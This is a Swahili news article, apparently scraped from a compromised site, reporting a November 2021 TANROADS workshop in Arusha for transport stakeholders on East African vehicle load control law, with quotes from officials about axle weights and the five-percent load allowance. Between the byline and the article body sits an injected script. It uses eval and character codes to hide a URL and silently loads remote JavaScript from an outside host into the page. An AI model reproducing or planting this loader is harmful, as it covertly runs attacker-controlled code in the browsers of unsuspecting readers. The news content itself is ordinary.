Recent Comments

TANROADS yawafunda wadau wa usafirishaji Arusha

By Juma Issihaka Nov 15, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

WAKALA ya Barabara Tanzania (TANROADS), leo Novemba 15, 2021, imeendelea kufanya Warsha kwa Wadau wa Sekta ya Usafirishaji kuhusu Sheria ya Afrika Mashariki ya Udhibiti Uzito wa Magari ya Mwaka 2016 na Kanuni zake za Mwaka 2018.

Warsha hiyo imefanyika katika Ukumbi wa AICC jijini Arusha na kuwakutanisha wadau wa sekta ya usafirishaji kutoka Mikoa ya Simiyu, Kilimanjaro na Arusha.

Arusha ni Mkoa wa 12, kuwakutanisha wadau wa sekta ya usafirishaji kwa ajili ya warsha hiyo inayohusisha jumla ya Mikoa 13 ya Tanzania bara.

Akizungumza kwa niaba ya Mkuu wa Mkoa wa Arusha Mhe. John Mongella, Katibu Tawala Msaidizi upande wa Miundombinu wa Mkoa huo, Eng. Amani Lymo, amesema warsha hiyo itatoa jawabu la changamoto zinazowakabili wadau wa usafirishaji katika mizani.

Ameeleza kufanyika kwa warsha hiyo, kunasukumwa na ukweli kwamba, kumekuwa na changamoto ya uelewa wa wadau wa sekta ya usafirishaji kuhusu sheria ya udhibiti wa magari.

Ameongeza kwamba, kupitia elimu hiyo wadau wa sekta ya usafirishaji watajengewa uwezo na uelewa kuhusu kiwango cha uzito wa mizigo kinachostahili kubebwa barabarani ili kulinda miundombinu ya barabara itumike kwa kipindi kilichokusudiwa.

Kwa upande wake, Mkuu wa Usalama barabarani Mkoa wa Arusha, Mrakibu wa Polisi Solomon Mwangamilo, amesema miundombinu hasa ya barabara huigusa moja kwa moja jamii.

“Tunatambua kwamba serikali inatumia gharama kubwa kujenga barabara, sasa kila mwananchi ana jukumu la kuzitunza kwa kadri iwezekanavyo ili ziwe namuda mrefu katika matumizi yake,” amesema.

Amesema kitendo cha gari kuzidisha uzito wa mizigo kinasababisha uharibifu wa barabara, ambao hatimaye unaigharimu serikali kufanya ukarabati.

Amesisitiza kwamba, warsha hiyo itajenga uelewa kwa wasafirishaji kuhusu uzingatiaji wa uzito wa mizigo wanayobeba katika magari.

Naye, Kaimu Meneja wa Shughuli za Mizani kutoka TANROADS, Eng. Japhet Kivuyo, amefafanua changamoto ya baadhi ya magari kuonekana yamezidi katika mzani mmoja na mwingine kuonekana sawa, akisema hiyo inatokana na kutozingatia asilimia tano iliyowekwa na sheria kufidia kucheza au kuhama kwa mzigo.

“Kwa kawaida tunajua barabara zetu sio kioo, unakuta zina matuta ambayo huweza kusababisha mzigo kuhamia katika mtaimbo mwingine, hivyo sheria hii imeweka asilimia tano zinazopaswa kuachwa na msafirishaji kufidia hilo,” amesema.

Amesema kinachosababisha malalamiko mengi katika hilo, ni baadhi ya wasafirishaji kupakia mzigo bila kuacha asilimia tano zilizotajwa na sheria kufidia kuhama au kucheza kwa mzigo.

Eng. Leonard Saukwa ni Msimamizi wa Mizani kutoka Wizara ya Ujenzi na Uchukuzi, amesema utofauti wa sheria ya sasa na ile ya mwaka 2001 ni ya sasa inatoza faini ya uzito wa jumla ya mtaimbo huku ya awali haikuwa na hilo.

Amesema uzito wa mtaimbo husababisha uharibifu wa barabara na uzito wa jumla huharibu madaraja.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.